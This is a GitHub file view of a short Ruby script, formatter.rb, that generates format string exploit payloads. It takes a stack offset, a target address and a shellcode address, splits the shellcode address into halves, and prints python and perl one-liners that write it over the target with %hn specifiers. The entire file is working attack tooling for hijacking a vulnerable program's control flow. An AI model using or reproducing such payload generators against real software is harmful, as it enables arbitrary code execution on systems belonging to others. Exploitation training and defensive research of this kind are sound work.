-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathformatter.rb
More file actions
executable file
·38 lines (32 loc) · 918 Bytes
/
formatter.rb
File metadata and controls
executable file
·38 lines (32 loc) · 918 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env ruby
def check_param(fmt)
=begin
Check the existence of parameter and if is not set, exit
=end
return if fmt =~ /^\d+:0x\h+:0x\h+$/
puts "syntax: #{$0} <position:target_address:shellcode_address>" ; exit
end
fmt = ARGV[0]
check_param(fmt)
offset, target_addr, shellcode_addr = fmt.split(":")
# get high / low ordered bytes, remove 0x prefix
hob = shellcode_addr[2,4].to_i(16)
lob = shellcode_addr[6,4].to_i(16)
addr = target_addr[2,8]
o = Integer(offset)
# p hob
a = []
if (hob > lob)
f = lob - 8
s = hob - lob
a << addr
a << "%08x" % (addr.to_i(16)+2)
else
f = hob - 8
s = lob - hob
a << "%08x" % (addr.to_i(16)+2)
a << addr
end
a.map! { |x| "\\x" + x.scan(/../).reverse.join("\\x") }
puts "python -c 'print \"#{a[0]}\"+\"#{a[1]}\"+\"%#{o}$#{f}x%#{o}$hn%#{o+1}$#{s}x%#{o+1}$hn\"'"
puts "perl -e 'print \"#{a[0]}\".\"#{a[1]}\".\"%#{o}\\$#{f}x%#{o}\\$hn%#{o+1}\\$#{s}x%#{o+1}\\$hn\"'"